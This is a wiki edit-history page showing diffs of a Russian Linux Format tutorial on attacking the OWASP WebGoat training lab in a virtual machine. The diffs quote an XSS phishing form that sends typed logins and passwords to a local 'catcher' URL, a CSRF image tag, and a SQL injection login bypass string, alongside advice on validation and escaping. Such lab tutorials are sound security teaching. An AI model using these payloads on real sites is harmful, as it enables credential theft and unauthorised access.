LXF159:Хакерам: Cайт в безопасности - История изменений

Olkol: /* Межсайтовый скриптинг */

2018-09-25T22:51:00Z

‎Межсайтовый скриптинг

Olkol: /* Межсайтовый скриптинг */

2018-09-25T22:49:28Z

‎Межсайтовый скриптинг

Olkol: /* Межсайтовый скриптинг */

2018-09-25T22:45:09Z

‎Межсайтовый скриптинг

Olkol: /* Межсайтовый скриптинг */

2018-09-25T22:44:21Z

‎Межсайтовый скриптинг

Olkol: /* Хакерам: Cайт в безопасности */

2018-09-25T09:35:10Z

‎Хакерам: Cайт в безопасности

Olkol: /* Хакерам: Cайт в безопасности */

2018-09-25T09:26:18Z

‎Хакерам: Cайт в безопасности

Olkol: /* Атакуйте и разрушайте */

2018-09-25T05:21:23Z

‎Атакуйте и разрушайте

Olkol: /* Атакуйте и разрушайте */

2018-09-25T05:10:56Z

‎Атакуйте и разрушайте

Olkol: /* Атакуйте и разрушайте */

2018-09-25T05:07:00Z

‎Атакуйте и разрушайте

Olkol: /* Атакуйте и разрушайте */

2018-09-25T04:57:45Z

‎Атакуйте и разрушайте

@@ Строка 120: / Строка 120: @@
   <pre><br><br><h1>Injected Text</h1> </pre>
-<br> – HTML-тэг перехода на новую строку, поэтому наш текст появляется уже на новой строке, а <h1>…</h1> говорит браузеру, что это заголовок. С HTML можно добавлять не только текст, но и формы. Для выполнения этой атаки нам потребуется и то, и другое. Форма будет собирать информацию о пользователе, а скрипт разместит ее на http://localhost/WebGoat/catcher?PROPERTY=yes
+<br> – HTML-тэг перехода на новую строку, поэтому наш текст появляется уже на новой строке, а
 Так как фишинг основан на том, чтобы обманным путем заставить пользователя ввести свои данные, нужно дать ему вескую причину войти на сайт. HTML-код нашей формы будет таким:

@@ Строка 124: / Строка 124: @@
 Так как фишинг основан на том, чтобы обманным путем заставить пользователя ввести свои данные, нужно дать ему вескую причину войти на сайт. HTML-код нашей формы будет таким:
-<br><br><h1>Важно: Наши серверы обнаружили необычную активность вашей учетной записи. Пожалуйста, немедленно
+<pre> <br><br><h1>Важно: Наши серверы обнаружили необычную активность вашей учетной записи. Пожалуйста, немедленно
 зайдите, чтобы пресечь неавторизованные действия
@@ Строка 132: / Строка 132: @@
 name=”login” onClick=”var image1=new Image; image1.src=’http://localhost:8080/webgoat/catcher?PROPERTY=yes&user=’+this.form.user.value+’&password=’+this.form.pass.value;”></form>
 Эта форма соберет логин и пароль пользователя и передаст их на сервер. Мораль: при обработке вводимых пользователем данных, которые будут отображаться на сайте, проверяйте их на наличие < и >, так как с их помощью можно создать HTML-тэги.

@@ Строка 118: / Строка 118: @@
 Это значит, что после Results for: можно вставить что угодно, и с небольшими знаниями HTML мы можем добавить не только обычный текст. Например, введите поисковый запрос:
-  <br><br><h1>Injected Text</h1>
+  <pre><br><br><h1>Injected Text</h1> </pre>
 <br> – HTML-тэг перехода на новую строку, поэтому наш текст появляется уже на новой строке, а <h1>…</h1> говорит браузеру, что это заголовок. С HTML можно добавлять не только текст, но и формы. Для выполнения этой атаки нам потребуется и то, и другое. Форма будет собирать информацию о пользователе, а скрипт разместит ее на http://localhost/WebGoat/catcher?PROPERTY=yes

@@ Строка 118: / Строка 118: @@
 Это значит, что после Results for: можно вставить что угодно, и с небольшими знаниями HTML мы можем добавить не только обычный текст. Например, введите поисковый запрос:
-<br><br><h1>Injected Text</h1>
+ <br><br><h1>Injected Text</h1>
 <br> – HTML-тэг перехода на новую строку, поэтому наш текст появляется уже на новой строке, а <h1>…</h1> говорит браузеру, что это заголовок. С HTML можно добавлять не только текст, но и формы. Для выполнения этой атаки нам потребуется и то, и другое. Форма будет собирать информацию о пользователе, а скрипт разместит ее на http://localhost/WebGoat/catcher?PROPERTY=yes

@@ Строка 110: / Строка 110: @@
 Лучшая защита от SQL-инъекции – и многих других атак – правильная проверка полей ввода. Очень немногим полям требуются символы «=», «’» и « %». А если ввод этих символов все же необходим, обязательно экранируйте их перед передачей в базу данных. Это нужно делать на сервере, так как с помощью WebScarab или других утилит для манипуляции с HTTP-запросами можно обойти валидацию полей ввода браузером.
-Межсайтовый скриптинг
+==Межсайтовый скриптинг==
 Межсайтовый скриптинг (Cross Site Scripting, или XSS) – метод воздействия на участок сайта, чтобы тот отображал ваше содержимое. Это возможно, когда на интерактивном сайте размещаются данные, вводимые пользователями. Откройте пункт меню Cross-Site Scripting (XSS) > Phishing With XSS [Межсайтовый скриптинг (XSS) > Фишинг с XSS]. Сначала просто наберите Test в поле поиска и нажмите Search [Искать]. На странице появится:
@@ Строка 137: / Строка 137: @@
 С помощью XSS также можно заставить браузер пользователя выполнить действие, которого он делать не собирался. Поскольку интерактивные web-страницы работают под управлением протокола HTTP, то если мы заставим браузер выполнить запрос HTTP GET, сервер может подумать, что пользователь хочет выполнить это действие. Самый простой способ заставить браузер выполнить запрос HTTP GET – с помощью загрузки изображения. Чтобы это изображение не повлияло на внешний вид страницы, мы можем сделать его размером в один пиксель. Перейдите в Cross Site Request Forgery [Создание межсайтовых запросов] и введите заголовок «Крутое сообщение – прочтите обязательно» и сообщение:
-Это важная информация.
+==Это важная информация.==
 <img src=”http://localhost:8080/webgoat/attack?Screen=89&
@@ Строка 157: / Строка 157: @@
 <img id=”image2” width=”1” height=”1” />
-Снижение риска
+==Снижение риска==
 Существует несколько способов снизить риск атак с поддержкой межсайтовых запросов. Так как для их выполнения пользователь должен быть в системе, можно снизить вероятность атак, автоматически отключая пользователя после некоторого периода бездействия. Кроме того, можно воспользоваться CSRF Guard, который можно найти на сайте www.owasp.org/index.php/PHP_CSRF_Guard.
 SQL-инъекция и XSS – лишь две разновидности атак на сайты. В WebGoat есть примеры многих других. Воспользуйтесь ссылками Hints и Solutions в верхней части страницы с уроками. Защита вашего сайта от таких атак обычно сводится к корректной валидации и экранированию потенциально опасных символов. Несколько примеров атак можно найти в разделе Applications > Internet > Web App Testing Tools [Приложения > Интернет > Утилиты для тестирования web-приложений], и с их помощью проверить, работает ли ваша защита. Подробную информацию о должных мерах защиты можно найти на сайте www.owasp.org/index.php/Cheat_Sheets. |

@@ Строка 6: / Строка 6: @@
 ''Безопасность web-сервера. Предотвратите трюки хакеров с помощью WebGoat.''
-[[Файл: Expert.png| left  |thumb|100px|  Бен Эверард
+[[Файл: Expert.png| left  |thumb|100px|  '''Наш эксперт'''. Бен Эверард
 бросил работу IT-консультанта, чтобы отправиться на два года в Танзанию устанавливать системы на базе Ubuntu в школах. Теперь его знания находят применение в бурлящем котле открытий – редакции Linux Format. ]]
-{{Врезка|left|Заголовок=Наш эксперт |Ширина=20%|Содержание= }}
 Думаете, при последних заплатках безопасности Apache ваш сайт защищен? Бен Эверард показывает, что хакеры все еще могут до него добраться.

@@ Строка 86: / Строка 86: @@
 Так как в SQL % – это маска, то запрос вернет все данные из таблицы weather_data. Это четыре станции в выпадающем списке и еще две, которые создатели сайта хотели скрыть. По завершении этого упражнения сайт переключится в более защищенную конфигурацию, в которой он проверяет, является ли ввод в SQL-запрос числом. Если вы попытаетесь выполнить запрос еще раз, атака завершится неудачно.
 Теперь перейдем в LAB: SQL Injection [ПРИМЕРЫ: SQL-инъекция] и рассмотрим некоторые способы применения этой техники. В наших примерах используется административный сайт вымышленной компании Goat Hills. На первом этапе мы обманным путем заставим сайт впустить нас в систему, не зная пароля.
@@ Строка 92: / Строка 93: @@
 Select * from employee WHERE userid = ‘ + userid + ‘ and password = ‘ + password
-Если этот запрос возвращает строку, то пользователь ввел верный пароль, и ему разрешается войти в систему. Введите имя пользователя Neville Bartholomew и пароль Test. Убедитесь, что WebScarab все еще перехватывает запросы, и нажмите Login [Войти]. Этот запрос можно изменить, добавив условие OR (ИЛИ) методом, аналогичным предыдущему упражнению. Перехватим HTTP-запрос и изменим поле пароля на
+Если этот запрос возвращает строку, то пользователь ввел верный пароль, и ему разрешается войти в систему. Введите имя пользователя Neville Bartholomew и пароль Test. Убедитесь, что WebScarab все еще перехватывает запросы, и нажмите Login [Войти]. Этот запрос можно изменить, добавив условие OR (ИЛИ) методом, аналогичным предыдущему упражнению.
 Test’ OR password LIKE ‘%

@@ Строка 60: / Строка 60: @@
 |-
 |[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Установка дополнений'''.> Зайдите в Devices > Install Guest Additions [Устройства > Установить гостевые дополнения]. Если выдается сообщение об ошибке, может понадобиться установка пакета virtualbox-guest-additions в основной системе. Нажмите OK для открытия автозапуска, затем Run [Запустить], и введите owasp в качестве пароля. После завершения установки перезапустите виртуальную машину. Теперь можно развернуть окно.  ]]
-|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''4 Запуск прокси'''.>
+|[[Файл: LXF159.tut_websec.owa_opt2.jpeg| center |thumb|300px| '''4 Запуск прокси'''.>
 Выберите пункт меню Applications > OWASP > Proxies > OWASP Web Scarab [Приложения > Прокси OWASP > OWASP Web Scarab]. Запустится прокси. Выделите ему не менее 64 МБ. В окне Web Scarab выберите Tools [Инструменты) и установите галочку Use Lite Interface [Использовать облегченный интерфейс]. Затем выберите пункт меню Applications > OWASP > WebGoat START [Приложенияя > OWASP > ЗАПУСК WebGoat]. Затем запустите Firefox.  ]]
 |-
-|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''5 FoxyProxy'''.>
+|[[Файл: LXF159.tut_websec.owa_opt4.jpeg| center |thumb|300px| '''5 FoxyProxy'''.>
 Закройте открывшееся по умолчанию окно Firefox, затем выберите пункт меню Applications > OWASP > Firefox WTE style [Приложения > OWASP > Firefox WTE] (это позволяет удобнее управлять прокси). Нажмите на FoxyProxy справа внизу и измените режим [Mode] на Use Proxy “WebScarab” for all URLs [Использовать прокси WebScarab для всех адресов]. ]]
-|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px|  '''6 Вперед!'''
+|[[Файл: LXF159.tut_websec.owa_opt6.jpeg| center |thumb|300px|  '''6 Вперед!'''
 Откройте Firefox и наберите в адресной строке http://localhost:8080/WebGoat/attack, и войдите в систему с именем пользователя и паролем guest. ]]
 |}

@@ Строка 58: / Строка 58: @@
 | [[Файл:LXF159.tut_websec.owa_opt1.jpeg | center |thumb|300px|  '''1 Подготовка.>'''Откройте VirtualBox и нажмите New [Создать], затем Next [Далее]. Введите Имя OWASP [Name OWASP], выберите Linux в качестве операционной системы [Operating system] и Linux 2.6 в качестве ее типа [Type]. В следующем окне выделите ей максимально возможное количество памяти – в идеале не менее 700 МБ. Нажмите Next, затем выберите Use Existing Hard Disk [Использовать существующий жесткий диск] и выберите свой новый файл VDI. Нажмите Next, затем Create. ]]
 | [[Файл: LXF159.tut_websec.owa_opt3.jpeg | center |thumb|300px|'''2 Вход в систему.'''>Запустите виртуальную машину. В окне входа в систему введите owasp в качестве имени пользователя и пароля. Время от времени Ubuntu будет предлагать вам обновить систему. Так как мы пользуемся системой временно, эти сообщения можно спокойно проигнорировать. ]]
 |[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Установка дополнений'''.> Зайдите в Devices > Install Guest Additions [Устройства > Установить гостевые дополнения]. Если выдается сообщение об ошибке, может понадобиться установка пакета virtualbox-guest-additions в основной системе. Нажмите OK для открытия автозапуска, затем Run [Запустить], и введите owasp в качестве пароля. После завершения установки перезапустите виртуальную машину. Теперь можно развернуть окно.  ]]
 |}

LXF159:Хакерам: Cайт в безопасности - История изменений

Olkol: /* Меж­сай­то­вый скрип­тинг */

Olkol: /* Меж­сай­то­вый скрип­тинг */

Olkol: /* Меж­сай­то­вый скрип­тинг */

Olkol: /* Меж­сай­то­вый скрип­тинг */

Olkol: /* Ха­ке­рам: Cайт в безо­пас­но­сти */

Olkol: /* Ха­ке­рам: Cайт в безо­пас­но­сти */

Olkol: /* Ата­куй­те и раз­ру­шай­те */

Olkol: /* Ата­куй­те и раз­ру­шай­те */

Olkol: /* Ата­куй­те и раз­ру­шай­те */

Olkol: /* Ата­куй­те и раз­ру­шай­те */

Olkol: /* Межсайтовый скриптинг */

Olkol: /* Межсайтовый скриптинг */

Olkol: /* Межсайтовый скриптинг */

Olkol: /* Межсайтовый скриптинг */

Olkol: /* Хакерам: Cайт в безопасности */

Olkol: /* Хакерам: Cайт в безопасности */

Olkol: /* Атакуйте и разрушайте */

Olkol: /* Атакуйте и разрушайте */

Olkol: /* Атакуйте и разрушайте */

Olkol: /* Атакуйте и разрушайте */